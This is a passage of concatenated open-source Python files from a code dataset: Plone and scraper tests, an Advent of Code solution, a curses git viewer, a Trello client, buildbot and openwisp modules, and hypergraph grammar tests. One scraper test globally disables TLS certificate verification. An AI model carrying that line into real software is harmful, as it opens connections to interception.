self.weblog_de.objectValues())\n\n def testFolderTranslationMoveTranslatedContent(self):\n english1 = 
makeContent(self.weblog_en, 'WeblogEntry', 'entry1')\n english1.setLanguage('en')\n english2 = makeContent(self.weblog_en, 'WeblogEntry', 'entry2')\n english2.setLanguage('en')\n german1 = makeTranslation(english1, 'de')\n german2 = makeTranslation(english2, 'de')\n transaction.savepoint(optimistic=True)\n self.weblog_de = makeTranslation(self.weblog_en, 'de')\n self.failUnless(english1.getId() in self.weblog_en.objectIds())\n self.failUnless(english2.getId() in self.weblog_en.objectIds())\n self.failIf(english1.getId() in self.weblog_de.objectIds())\n self.failIf(english2.getId() in self.weblog_de.objectIds())\n self.failUnless(german1.getId() in self.weblog_de.objectIds())\n self.failUnless(german2.getId() in self.weblog_de.objectIds())\n self.failIf(german1.getId() in self.weblog_en.objectIds())\n self.failIf(german2.getId() in self.weblog_en.objectIds())\n\n def testSetLanguageMoveTranslatedContent(self):\n self.weblog_de = makeTranslation(self.weblog_en, 'de')\n en2de = makeContent(self.weblog_en, 'WeblogEntry', 'entry2')\n en2de.setLanguage('en')\n transaction.savepoint(optimistic=True)\n en2de.setLanguage('de')\n self.failIf(en2de.getId() in self.weblog_en.objectIds())\n self.failUnless(en2de.getId() in self.weblog_de.objectIds())\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n from Products.LinguaPlone.tests import LinguaPloneTestCase\n LinguaPloneTestCase # PYFLAKES\n suite.addTest(makeSuite(TestWeblogTranslation))\n return suite\n","repo_name":"collective/Products.Quills","sub_path":"Products/Quills/tests/test_weblogLinguaPlone.py","file_name":"test_weblogLinguaPlone.py","file_ext":"py","file_size_in_byte":3196,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"73185619364","text":"import unittest\nimport diplomaticpulse.parsers.beautifulsoup_parser as util\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\n\n# following is just to ignore https certificate issues\nimport ssl\nssl._create_default_https_context = ssl._create_unverified_context\n\n\nclass TestHtmlUtils(unittest.TestCase):\n \"\"\"\n Class containing the test suite for get_text_from_html_block(().\n\n Tests are programmed as prescribed the pythons unittest's package.\n\n \"\"\"\n\n def setUp(self):\n options = Options()\n options.add_argument(\"--headless\")\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--disable-gpu\") # Last I checked this was necessary.\n self.driver = webdriver.Chrome(chrome_options=options)\n\n def test_get_text_from_html_block1(self):\n \"\"\"\n We pass url, xpaths, driver to get_text_from_html_block( and expect text\n \"\"\"\n url = \"http://localhost/scrapy.html\"\n xpaths = {\"global\": \"div,container\", \"link\": \"html.a\", \"posted_date\": \"li.a\"}\n\n result = util.get_text_from_html_block(url, xpaths, self.driver)\n expected = [{'url': 'https://scrapy.org/', 'title': None, 'posted_date': None},\n {'url': 'https://www.zyte.com/', 'title': None, 'posted_date': None},\n {'url': 'https://www.zyte.com/scrapy-cloud/', 'title': None, 'posted_date': None},\n {'url': 'https://github.com/scrapy/scrapy', 'title': None, 'posted_date': None}]\n self.assertEqual(expected, result)\n\n def test_get_text_from_html_block2(self):\n \"\"\"\n We pass url, xpaths, driver to get_info_from_html_block and expect text\n \"\"\"\n url = \"http://localhost/scrapy.html\"\n xpaths = {\n \"global\": \"div,container\",\n \"link\": \"html.a\",\n \"title\": 
\"li\",\n \"posted_date\": \"li.a\",\n }\n result = util.get_text_from_html_block(url, xpaths, self.driver)\n expected = [{'url': 'https://scrapy.org/', 'title': None, 'posted_date': None},\n {'url': 'https://www.zyte.com/', 'title': None, 'posted_date': None},\n {'url': 'https://www.zyte.com/scrapy-cloud/', 'title': None, 'posted_date': None},\n {'url': 'https://github.com/scrapy/scrapy', 'title': None, 'posted_date': None}]\n self.assertEqual(expected, result)\n","repo_name":"qcri/DiplomaticPulse","sub_path":"diplomaticpulse/tests/test_get_text_from_html_block.py","file_name":"test_get_text_from_html_block.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"11787597425","text":"# Toboggan Trajectory\n\ndef read_from_file(file_name):\n _file = open(file_name, 'r')\n _read = _file.read().split(\"\\n\")\n _file.close()\n return _read\n\npuzzle_input = read_from_file(\"inputs/day03.txt\")\n\ndef solve1(dx=3, dy=1):\n width = len(puzzle_input[0])\n\n num_trees = 0\n y = 0\n x = 0\n while True:\n\n x += dx\n y += dy\n if y >= len(puzzle_input):\n break\n if puzzle_input[y][x % width] == \"#\":\n num_trees+=1\n return num_trees\n\ndef solve2():\n i = 1\n for k in [[1, 1], [3, 1], [5, 1], [7, 1], [1, 2]]:\n i *= solve1(k[0], k[1])\n return i\n \nprint(\"Pt1:\", solve1())\nprint(\"Pt2:\", solve2())\n","repo_name":"Germax26/Advent-of-Code","sub_path":"2020/day03.py","file_name":"day03.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"71333500326","text":"import curses\nimport os\n\nimport pygit2\n\nfrom gitcurses.colors import Colors\n\n\nclass Application:\n\n def __init__(self):\n screen = curses.initscr()\n maxy, maxx = screen.getmaxyx()\n self.max_y = maxy\n self.max_x = maxx\n self.screen = screen\n\n def __enter__(self):\n curses.noecho()\n curses.cbreak()\n self.screen.keypad(True)\n curses.start_color()\n curses.curs_set(0)\n return self\n\n def __exit__(self, *args):\n curses.echo()\n curses.nocbreak()\n self.screen.keypad(False)\n\n def run(self):\n quit = False\n\n repo = pygit2.Repository(os.getcwd())\n branch_name = repo.head.shorthand\n remotes = repo.remotes\n self.screen.attron(Colors.get_pair(curses.COLOR_WHITE, curses.COLOR_MAGENTA))\n self.screen.hline(0, 0, ' ', self.max_x)\n self.screen.addstr(0, 1, \"GitCurses v0.1\")\n self.screen.addstr(2, 1, f\"Head: {branch_name}\", Colors.get_pair(curses.COLOR_WHITE))\n if remotes:\n self.screen.addstr(3, 1, f\"Upstream: {remotes}\", Colors.get_pair(curses.COLOR_CYAN))\n\n while not quit:\n next_input = self.screen.getkey()\n self.screen.addstr(2, 1, next_input, Colors.get_pair(curses.COLOR_GREEN, curses.COLOR_BLUE))\n self.screen.addstr(3, 1, next_input, Colors.get_pair(curses.COLOR_CYAN))\n self.screen.attron(Colors.get_pair(curses.COLOR_BLUE))\n self.screen.hline(5, 0, '-', self.max_x)\n if 'q' in next_input:\n quit = True\n\n","repo_name":"areading314/gitcurses","sub_path":"gitcurses/application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"32312781543","text":"from typing import List\n\nimport requests\nimport logging\n\nlogger = logging.getLogger(__file__)\n\nBASE_ENTRY_POINT = 'https://api.trello.com/1'\n\n\nclass TrelloApiClient:\n def __init__(self, key, token):\n self._key = key\n 
self._token = token\n\n def _RequestApi(self, url, method, data={}):\n data['key'] = self._key\n data['token'] = self._token\n\n resp = 0\n if method == 'GET':\n resp = requests.get(url, data=data)\n elif method == 'POST':\n resp = requests.post(url, data=data)\n elif method == 'PUT':\n resp = requests.put(url, data=data)\n else:\n resp = 0\n\n return resp\n\n def _add_card(self, card_title: str, list_id: str):\n url = '%s/%s' % (BASE_ENTRY_POINT, 'cards')\n data = {\n 'idList': list_id,\n 'name': card_title\n }\n resp = self._RequestApi(url, 'POST', data=data)\n logger.info(resp.status_code)\n if resp.status_code == 200:\n card_title = resp.json()['name']\n logger.info('create card: %s' % card_title)\n return card_title\n else:\n logger.warning('')\n return None\n\n def add_cards(self, card_titles, list_id):\n added_cards = []\n logger.info(card_titles)\n for title in card_titles:\n added_cards.append(self._add_card(title, list_id))\n logger.info(added_cards)\n return list(filter(lambda x: x, added_cards))\n\n def get_cards_on_list(self, list_id: str):\n url = '%s/%s/%s/%s' % (BASE_ENTRY_POINT, 'list', list_id, 'cards')\n data = {\n 'idList': list_id\n }\n resp = self._RequestApi(url, 'GET', data=data)\n logger.info(resp.status_code)\n if resp.status_code == 200:\n return [{'id': card['id'], 'name': card['name']} for card in resp.json()]\n else:\n return []\n\n def _close_card_by_id(self, card_id: str):\n url = '%s/%s/%s' % (BASE_ENTRY_POINT, 'cards', card_id)\n data = {\n 'closed': 'true'\n }\n resp = self._RequestApi(url, 'PUT', data)\n logger.info(resp.status_code)\n if resp.status_code == 200:\n return resp.json()['name']\n else:\n return None\n\n def close_cards_by_titles(self, card_titles: List[str], list_id: str):\n cards = self.get_cards_on_list(list_id)\n closed_cards = []\n for title in card_titles:\n for card in cards:\n if card['name'] == title:\n closed_cards.append(self._close_card_by_id(card['id']))\n return list(set(list(filter(lambda x: x, closed_cards))))\n","repo_name":"mpozpnd/ActionsOnTrello","sub_path":"src/g2trello/trello.py","file_name":"trello.py","file_ext":"py","file_size_in_byte":2697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13055776406","text":"from buildbot import config\nfrom buildbot import interfaces\nfrom buildbot import util\nfrom buildbot.process import metrics\nfrom twisted.application import service\nfrom twisted.internet import defer\nfrom twisted.python import log\nfrom zope.interface import implements\n\n\nclass ChangeManager(config.ReconfigurableServiceMixin, service.MultiService):\n\n \"\"\"\n This is the master-side service which receives file change notifications\n from version-control systems.\n\n It is a Twisted service, which has instances of\n L{buildbot.interfaces.IChangeSource} as child services. 
These are added by\n    the master with C{addSource}.\n    \"\"\"\n\n    implements(interfaces.IEventSource)\n\n    name = \"changemanager\"\n\n    def __init__(self, master):\n        service.MultiService.__init__(self)\n        self.setName('change_manager')\n        self.master = master\n\n    @defer.inlineCallbacks\n    def reconfigService(self, new_config):\n        timer = metrics.Timer(\"ChangeManager.reconfigService\")\n        timer.start()\n\n        removed, added = util.diffSets(\n            set(self),\n            new_config.change_sources)\n\n        if removed or added:\n            log.msg(\"adding %d new changesources, removing %d\" %\n                    (len(added), len(removed)))\n\n            for src in removed:\n                yield defer.maybeDeferred(\n                    src.disownServiceParent)\n                src.master = None\n\n            for src in added:\n                src.master = self.master\n                src.setServiceParent(self)\n\n        num_sources = len(list(self))\n        assert num_sources == len(new_config.change_sources)\n        metrics.MetricCountEvent.log(\"num_sources\", num_sources, absolute=True)\n\n        # reconfig any newly-added change sources, as well as existing\n        yield config.ReconfigurableServiceMixin.reconfigService(self,\n                                                                new_config)\n\n        timer.stop()\n","repo_name":"jollyroger/debian-buildbot","sub_path":"buildbot/changes/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":1947,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"52"} +{"seq_id":"7465856968","text":"\"\"\" \nAuthor of this code: W. Vrielink\n\nFurther documentation:\nhttps://github.com/WouterVrielink/FWAPPA\n\"\"\"\n\nimport math\nimport numpy as np\n# from point import Point\nfrom solver import strip, random_solver, greedy\nfrom route import Route\nfrom distance import select_closest, euclidean_distance, route_distance\n\n\n\nclass Environment(object):\n    \"\"\"\n    The Environment class wraps the problem instance in such a way that the\n    algorithm class does not have to know anything about the underlying problem\n    or its properties.\n    \"\"\"\n\n    def __init__(self, problem, m):\n        \"\"\"\n        args:\n            problem: the problem instance to be solved\n            m: the number of individuals in the population\n        \"\"\"\n        self.problem = problem\n        self.m = m\n\n        # Prepare data lists for statistics\n        self.evaluation_statistics = []\n        self.evaluation_statistics_best = []\n        self.generation_statistics = []\n\n        self.generation_number = 0\n        self.evaluation_number = 0\n        self.cur_best = math.inf\n        self.cur_best_route = None\n\n    def get_random_population(self):\n        \"\"\"\n        Randomly initializes a population of size self.m.\n\n        returns:\n            A list of randomly generated individuals.\n        \"\"\"\n        print(\"-------- CREATING START POPULATION --------\")\n        # return [strip(self.problem, self)] + [random_solver(self.problem, self) for _ in range(rand)] + [greedy(self.problem, self) for _ in range(greed)]\n        return [random_solver(self.problem, self) for _ in range(self.m)]\n\n\n    def calculate_fitness(self, route_df):\n        \"\"\"\n        Calculate the fitness of an individual, given as a route.\n\n        args:\n            route_df: the route to evaluate\n\n        returns:\n            The total distance of the route (float).\n        \"\"\"\n        self.evaluation_number += 1\n        fitness = route_distance(route_df)\n        self.evaluation_statistics.append(fitness)\n\n        # Update curbest value\n        if fitness < self.cur_best:\n            self.cur_best = fitness\n            self.cur_best_route = Route(route_df, self)\n\n        self.evaluation_statistics_best.append(self.cur_best)\n        self.generation_statistics.append(self.generation_number)\n        return fitness\n\n    def get_evaluation_statistics(self):\n        return list(range(1, self.evaluation_number + 1)), 
self.evaluation_statistics\n\n def get_evaluation_statistics_best(self):\n return list(range(1, self.evaluation_number + 1)), self.evaluation_statistics_best\n\n def get_generation_statistics(self):\n return list(range(1, self.evaluation_number + 1)), self.generation_statistics\n","repo_name":"marleentheyoung/BScKI_Thesis_PPA","sub_path":"code_discrete_PPA/code/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5731353039","text":"import sys\ninput = sys.stdin.readline\n\nsize = int(input())\ntable = list(map(int, input().split()))\nanswer = [0 for _ in range(size)]\n\nstack = []\n\nfor idx in range(size):\n if not stack:\n answer[idx] = 0\n stack.append((idx+1, table[idx]))\n else:\n while stack:\n if stack[-1][1] < table[idx]:\n stack.pop()\n else:\n break\n \n if stack:\n answer[idx] = stack[-1][0]\n else:\n answer[idx] = 0\n stack.append((idx+1, table[idx]))\n\nfor ans in answer:\n print(ans, end=' ')","repo_name":"BangDori/python-algorithm","sub_path":"baekjoon/2493.py","file_name":"2493.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"45096285707","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\" Title \"\"\"\n\n__author__ = \"Hiroshi Kajino \"\n__copyright__ = \"(c) Copyright IBM Corp. 2018\"\n__version__ = \"0.1\"\n__date__ = \"Jan 1 2018\"\n\nfrom graph_grammar.io.smi import HGGen\nfrom graph_grammar.graph_grammar.hrg import extract_prod_rule, HyperedgeReplacementGrammar, IncrementalHyperedgeReplacementGrammar\nfrom graph_grammar.algo.tree_decomposition import tree_decomposition\nfrom networkx.algorithms.isomorphism import GraphMatcher\nimport os\nimport unittest\n\nclass HRGTest(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n '''\n def test_extract_prod_rule(self):\n base = os.path.dirname(os.path.abspath(__file__))\n hg_list = HGGen(os.path.join(base, \"test.smi\"))\n \n for each_hg in hg_list:\n clique_tree = tree_decomposition(each_hg)\n for each_node in clique_tree.nodes:\n parent = each_node\n myself = sorted(list(dict(clique_tree[parent]).keys()))[0]\n children = list(dict(clique_tree[myself]).keys())\n children.remove(parent)\n prod_rule = extract_prod_rule(\n clique_tree.node[parent][\"subhg\"], clique_tree.node[myself][\"subhg\"],\n [clique_tree.node[each_child][\"subhg\"] for each_child in children])\n self.assertTrue(check_prod_rule(prod_rule))\n '''\n def test_hrg(self):\n base = os.path.dirname(os.path.abspath(__file__))\n hg_list = HGGen(os.path.join(base, \"test.smi\"))\n #if not os.path.exists('hg'):\n # os.mkdir('hg')\n #for each_idx, each_hg in enumerate(hg_list):\n # each_hg.draw(os.path.join('hg', f'{each_idx}'))\n hrg = HyperedgeReplacementGrammar()\n prod_rule_seq_list = hrg.learn(hg_list)\n print(\"the number of prod rules is {}\".format(hrg.num_prod_rule))\n '''\n if not os.path.exists('prod_rules'):\n os.mkdir('prod_rules')\n if not os.path.exists('subhg'):\n os.mkdir('subhg')\n for each_idx, each_prod_rule in enumerate(hrg.prod_rule_corpus.prod_rule_list):\n self.assertTrue(check_prod_rule(each_prod_rule))\n each_prod_rule.draw(os.path.join('prod_rules', f'{each_idx}'))\n for each_idx, each_subhg in enumerate(hrg.clique_tree_corpus.subhg_list):\n each_subhg.draw(os.path.join('subhg', f'{each_idx}'), True)\n import gzip, pickle\n with 
gzip.open(os.path.join('prod_rules', 'hrg.pklz'), 'wb') as f:\n pickle.dump(hrg, f)\n '''\n\n def test_iso(self):\n base = os.path.dirname(os.path.abspath(__file__))\n hg_list = HGGen(os.path.join(base, \"test.smi\"))\n hg_list = list(hg_list)\n hrg = HyperedgeReplacementGrammar()\n prod_rule_seq_list = hrg.learn(hg_list)\n not_iso = 0\n for idx, each_prod_rule_seq in enumerate(prod_rule_seq_list):\n hg = hrg.construct(each_prod_rule_seq)\n self.assertEqual(len(hg.nodes), len(list(hg_list)[idx].nodes))\n self.assertEqual(len(hg.edges), len(list(hg_list)[idx].edges))\n gm = GraphMatcher(hg.hg, list(hg_list)[idx].hg)\n try:\n isomap = next(gm.isomorphisms_iter())\n except StopIteration:\n isomap = None\n if isomap is None:\n print(\"not isomorphic\")\n not_iso += 1\n self.assertEqual(not_iso, 0)\n print(\"not_iso = {}\".format(not_iso))\n\n def test_revert(self):\n base = os.path.dirname(os.path.abspath(__file__))\n hg_list = HGGen(os.path.join(base, \"test.smi\"))\n hrg = HyperedgeReplacementGrammar()\n prod_rule_seq_list = hrg.learn(hg_list)\n\n for each_hg_id in range(len(list(hg_list))):\n tmp = list(hg_list)[each_hg_id]\n each_prod_rule_id = -1\n # reverting may yield a different intermediate hypergraph, when it may matches a different subgraph.\n # but, the first step must be reverted.\n tmp, success = hrg.prod_rule_corpus.prod_rule_list[prod_rule_seq_list[each_hg_id][each_prod_rule_id]].revert(tmp)\n self.assertTrue(success, 'fails hg={}, prod_rule={}'.format(\n each_hg_id, prod_rule_seq_list[each_hg_id][each_prod_rule_id]))\n # this not necessarily works because the first revert can be applied to multiple portions.\n #each_prod_rule_id -= 1\n #tmp, success = hrg.prod_rule_corpus.prod_rule_list[prod_rule_seq_list[each_hg_id][each_prod_rule_id]].revert(tmp)\n #self.assertTrue(success, 'fails hg={}, prod_rule={}'.format(\n # each_hg_id, prod_rule_seq_list[each_hg_id][each_prod_rule_id]))\n'''\nclass IncrementalHRGTest(unittest.TestCase):\n\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def test_hrg(self):\n base = os.path.dirname(os.path.abspath(__file__))\n hg_list = HGGen(os.path.join(base, \"test.smi\"))\n hrg = IncrementalHyperedgeReplacementGrammar()\n prod_rule_seq_list = hrg.learn(hg_list)\n print(\"the number of prod rules is {}\".format(len(hrg.prod_rule_list)))\n for each_prod_rule in hrg.prod_rule_list:\n self.assertTrue(check_prod_rule(each_prod_rule))\n\n def test_iso(self):\n base = os.path.dirname(os.path.abspath(__file__))\n hg_list = HGGen(os.path.join(base, \"test.smi\"))\n hg_list = list(hg_list)\n hrg = IncrementalHyperedgeReplacementGrammar()\n prod_rule_seq_list = hrg.learn(hg_list)\n not_iso = 0\n for idx, each_prod_rule_seq in enumerate(prod_rule_seq_list):\n hg = hrg.construct(each_prod_rule_seq)\n self.assertEqual(len(hg.nodes), len(list(hg_list)[idx].nodes))\n self.assertEqual(len(hg.edges), len(list(hg_list)[idx].edges))\n gm = GraphMatcher(hg.hg, list(hg_list)[idx].hg)\n try:\n isomap = next(gm.isomorphisms_iter())\n except StopIteration:\n isomap = None\n if isomap is None:\n print(\"not isomorphic\")\n not_iso += 1\n self.assertEqual(not_iso, 0)\n print(\"not_iso = {}\".format(not_iso))\n''' \ndef check_prod_rule(prod_rule):\n ok_rule = True\n ext_node_list = []\n if not prod_rule.is_start_rule:\n for each_node in prod_rule.lhs.nodes:\n ext_node_list.append(each_node)\n if len(prod_rule.rhs.adj_edges(each_node)) != 1: ok_rule = False\n for each_node in prod_rule.rhs.nodes - set(ext_node_list):\n if len(prod_rule.rhs.adj_edges(each_node)) != 
2: ok_rule = False\n for each_edge in prod_rule.rhs.edges:\n if \"nt_idx\" in prod_rule.rhs.edge_attr(each_edge) \\\n and prod_rule.rhs.edge_attr(each_edge)[\"terminal\"]:\n ok_rule = False\n return ok_rule\n \nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"ibm-research-tokyo/graph_grammar","sub_path":"src/tests/hrg_test.py","file_name":"hrg_test.py","file_ext":"py","file_size_in_byte":6976,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"52"} +{"seq_id":"11857838795","text":"import sys\nimport glob\nimport random\n\nimport pygame\nimport pygame.locals\nfrom PIL import Image, ImageFilter\n\nclass View() :\n\n def __init__(self):\n\n # Initialize PyGame\n pygame.init()\n\n self.screen = pygame.display.set_mode( (700,700), 0, 32)\n pygame.display.set_caption(\"ElectricDreamz\")\n\n # Set up FPS clock\n self.fps = 60\n self.fpsClock = pygame.time.Clock()\n\n self.speed = 0.1\n\n def loadImages(self):\n\n self.images_path = []\n self.images = []\n for path in glob.glob(\"./\"+word+\"/*.jpeg\"):\n self.images_path.append(path)\n self.images.append(pygame.image.load(path))\n\n self.coordinates = [ random.randint(0, 100) for i in self.images ]\n self.coordinates[random.randint(0,len(self.images)-1)] = 100\n self.renorm_coordinates()\n self.direction = random.randint(0,len(self.images)-1)\n\n self.font = pygame.font.Font(\"./Lack-Regular.otf\",50)\n self.text1 = self.makeText(\"What is\")\n self.text2 = self.makeText(\"'\"+word+\"' ?\")\n\n\n def change_direction(self):\n\n self.direction = random.randint(0,len(self.images)-1)\n\n def renorm_coordinates(self):\n\n s = sum(self.coordinates)\n self.coordinates = [ c/s for c in self.coordinates ]\n\n def makeText(self, text, insideColor = (250,250,250), outsideColor=(150,150,150)) :\n\n return self.font.render(text, 1, insideColor )\n textIn = self.font.render(text, 1, insideColor )\n #textOut = self.font.render(text, 1, outsideColor)\n #size = textIn.get_width() + 2, textIn.get_height() + 2\n #s = pygame.Surface(size, pygame.SRCALPHA, 32)\n #s.blit(textOut,(0,0))\n #s.blit(textOut,(2,2))\n #s.blit(textOut,(2,0))\n #s.blit(textOut,(0,2))\n #s.blit(textIn, (1,1))\n\n #return s\n\n def mainLoop(self) :\n\n # Handle events\n self.eventHandler()\n\n # Handle keys\n self.keysHandler()\n\n # Render elements\n self.update()\n self.render()\n\n # Update screen\n pygame.display.update()\n self.fpsClock.tick(self.fps)\n\n\n def eventHandler(self) :\n\n for event in pygame.event.get():\n\n if (event.type == pygame.QUIT) :\n pygame.quit()\n sys.exit()\n\n\n def keysHandler(self) :\n\n pass\n #keyPressed = pygame.key.get_pressed()\n #print(keyPressed)\n\n def blur(self,image, radius):\n\n # Convert the surface to PIL image\n surfSize = image.get_size()\n surfInString = pygame.image.tostring(image, \"RGBA\", False)\n surfPIL = Image.frombytes(\"RGBA\", surfSize, surfInString)\n\n # Blur image using PIL\n surfPILblurred = surfPIL.filter(ImageFilter.GaussianBlur(radius=radius))\n return pygame.image.fromstring(surfPILblurred.tobytes(\"raw\", \"RGBA\"), surfSize, \"RGBA\")\n\n\n def update(self):\n\n current_max = max(self.coordinates)\n current_max_coordinate = [i for i,j in enumerate(self.coordinates) if j == current_max][0]\n if current_max >= 0.99 and current_max_coordinate == self.direction:\n self.change_direction()\n elif current_max <= 0.80 and random.randint(0,100)<6:\n self.change_direction()\n\n self.speed = 0.9 * self.speed + 0.1 * max((1-current_max)/7.5,0.02)\n\n 
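# The pace is an exponential moving average (assumed intent: slow the transition as the chosen image comes into focus);\n        # the chosen image's weight is then increased by that amount below.\n        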
self.coordinates[self.direction] += self.speed\n self.renorm_coordinates()\n\n def render(self):\n\n self.screen.fill( (0,0,0) )\n\n coordinates_and_images = sorted(zip(self.coordinates, self.images), key=lambda ci:ci[0], reverse=True)\n\n i = 0\n for coordinate, image in coordinates_and_images:\n render_image = self.blur(image, (25*(1-coordinate))**1.5)\n render_image.set_alpha(int((1-coordinate)*255))\n if i == 0:\n self.screen.blit(render_image, (0,0))\n else:\n self.screen.blit(render_image, (0,0), special_flags=pygame.BLEND_RGBA_MIN)\n i+=1\n if i >= 5:\n break\n\n #size = textIn.get_width() + 2, textIn.get_height() + 2\n self.screen.blit(pygame.transform.scale(self.screen, (750*2,750*2)), (0,0))\n w1 = self.text1.get_width()\n h1 = self.text1.get_height()\n w2 = self.text2.get_width()\n h2 = self.text2.get_height()\n self.screen.blit(self.text1, (750/2-w1/2, 750/2-h1-10))\n self.screen.blit(self.text2, (750/2-w2/2, 750/2+10))\n\n\ndef main():\n\n v = View()\n v.loadImages()\n\n while True:\n v.mainLoop()\n\nword = sys.argv[1]\nmain()\n","repo_name":"hackstub/neuralWhat","sub_path":"play.py","file_name":"play.py","file_ext":"py","file_size_in_byte":4605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29209898995","text":"import subprocess\r\n\r\nfrom django.core.exceptions import ValidationError\r\nfrom jsonschema import draft7_format_checker, validate\r\nfrom jsonschema.exceptions import ValidationError as SchemaError\r\nfrom swapper import load_model\r\n\r\nfrom openwisp_utils.utils import deep_merge_dicts\r\n\r\nfrom ... import settings as monitoring_settings\r\nfrom .. import settings as app_settings\r\nfrom ..exceptions import OperationalError\r\nfrom .base import BaseCheck\r\n\r\nChart = load_model('monitoring', 'Chart')\r\nMetric = load_model('monitoring', 'Metric')\r\nAlertSettings = load_model('monitoring', 'AlertSettings')\r\n\r\nDEFAULT_PING_CHECK_CONFIG = {\r\n 'count': {\r\n 'type': 'integer',\r\n 'default': 5,\r\n 'minimum': 2,\r\n # chosen to avoid slowing down the queue\r\n 'maximum': 20,\r\n },\r\n 'interval': {\r\n 'type': 'integer',\r\n 'default': 25,\r\n 'minimum': 10,\r\n # chosen to avoid slowing down the queue\r\n 'maximum': 1000,\r\n },\r\n 'bytes': {'type': 'integer', 'default': 56, 'minimum': 12, 'maximum': 65508},\r\n 'timeout': {\r\n 'type': 'integer',\r\n 'default': 800,\r\n 'minimum': 5,\r\n # arbitrary chosen to avoid slowing down the queue\r\n 'maximum': 1500,\r\n },\r\n}\r\n\r\n\r\ndef get_ping_schema():\r\n schema = {\r\n '$schema': 'http://json-schema.org/draft-07/schema#',\r\n 'type': 'object',\r\n 'additionalProperties': False,\r\n }\r\n schema['properties'] = deep_merge_dicts(\r\n DEFAULT_PING_CHECK_CONFIG, app_settings.PING_CHECK_CONFIG\r\n )\r\n return schema\r\n\r\n\r\nclass Ping(BaseCheck):\r\n schema = get_ping_schema()\r\n\r\n def validate_params(self):\r\n try:\r\n validate(self.params, self.schema, format_checker=draft7_format_checker)\r\n except SchemaError as e:\r\n message = 'Invalid param'\r\n path = '/'.join(e.path)\r\n if path:\r\n message = '{0} in \"{1}\"'.format(message, path)\r\n message = '{0}: {1}'.format(message, e.message)\r\n raise ValidationError({'params': message}) from e\r\n\r\n def check(self, store=True):\r\n count = self._get_param('count')\r\n interval = self._get_param('interval')\r\n bytes_ = self._get_param('bytes')\r\n timeout = self._get_param('timeout')\r\n ip = self._get_ip()\r\n # if the device has no available IP\r\n if not ip:\r\n monitoring = 
self.related_object.monitoring\r\n # device not known yet, ignore\r\n if monitoring.status == 'unknown':\r\n return\r\n # device is known, simulate down\r\n result = {'reachable': 0, 'loss': 100.0}\r\n if store:\r\n self.store_result(result)\r\n return result\r\n command = [\r\n 'fping',\r\n '-e', # show elapsed (round-trip) time of packets\r\n '-c %s' % count, # count of pings to send to each target,\r\n '-p %s' % interval, # interval between sending pings(in ms)\r\n '-b %s' % bytes_, # amount of ping data to send\r\n '-t %s' % timeout, # individual target initial timeout (in ms)\r\n '-q',\r\n ip,\r\n ]\r\n stdout, stderr = self._command(command)\r\n # fpings shows statistics on stderr\r\n output = stderr.decode('utf8')\r\n try:\r\n parts = output.split('=')\r\n if len(parts) > 2:\r\n min, avg, max = parts[-1].strip().split('/')\r\n i = -2\r\n else:\r\n i = -1\r\n sent, received, loss = parts[i].strip().split(',')[0].split('/')\r\n loss = float(loss.strip('%'))\r\n except (IndexError, ValueError) as e:\r\n message = 'Unrecognized fping output:\\n\\n{0}'.format(output)\r\n raise OperationalError(message) from e\r\n result = {'reachable': int(loss < 100), 'loss': loss}\r\n if result['reachable']:\r\n result.update(\r\n {'rtt_min': float(min), 'rtt_avg': float(avg), 'rtt_max': float(max)}\r\n )\r\n if store:\r\n self.store_result(result)\r\n return result\r\n\r\n def store_result(self, result):\r\n \"\"\"\r\n store result in the DB\r\n \"\"\"\r\n metric = self._get_metric()\r\n copied = result.copy()\r\n reachable = copied.pop('reachable')\r\n metric.write(reachable, extra_values=copied)\r\n\r\n def _get_param(self, param):\r\n \"\"\"\r\n Gets specified param or its default value according to the schema\r\n \"\"\"\r\n return self.params.get(param, self.schema['properties'][param]['default'])\r\n\r\n def _get_ip(self):\r\n \"\"\"\r\n Figures out ip to use or fails raising OperationalError\r\n \"\"\"\r\n device = self.related_object\r\n ip = device.management_ip\r\n if not ip and not app_settings.MANAGEMENT_IP_ONLY:\r\n ip = device.last_ip\r\n return ip\r\n\r\n def _command(self, command):\r\n \"\"\"\r\n Executes command (easier to mock)\r\n \"\"\"\r\n p = subprocess.run(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\r\n return p.stdout, p.stderr\r\n\r\n def _get_metric(self):\r\n \"\"\"\r\n Gets or creates metric\r\n \"\"\"\r\n metric, created = self._get_or_create_metric()\r\n if created:\r\n self._create_alert_settings(metric)\r\n self._create_charts(metric)\r\n return metric\r\n\r\n def _create_alert_settings(self, metric):\r\n alert_settings = AlertSettings(metric=metric)\r\n alert_settings.full_clean()\r\n alert_settings.save()\r\n\r\n def _create_charts(self, metric):\r\n \"\"\"\r\n Creates device charts if necessary\r\n \"\"\"\r\n charts = ['uptime', 'packet_loss', 'rtt']\r\n for chart in charts:\r\n if chart not in monitoring_settings.AUTO_CHARTS:\r\n continue\r\n chart = Chart(metric=metric, configuration=chart)\r\n 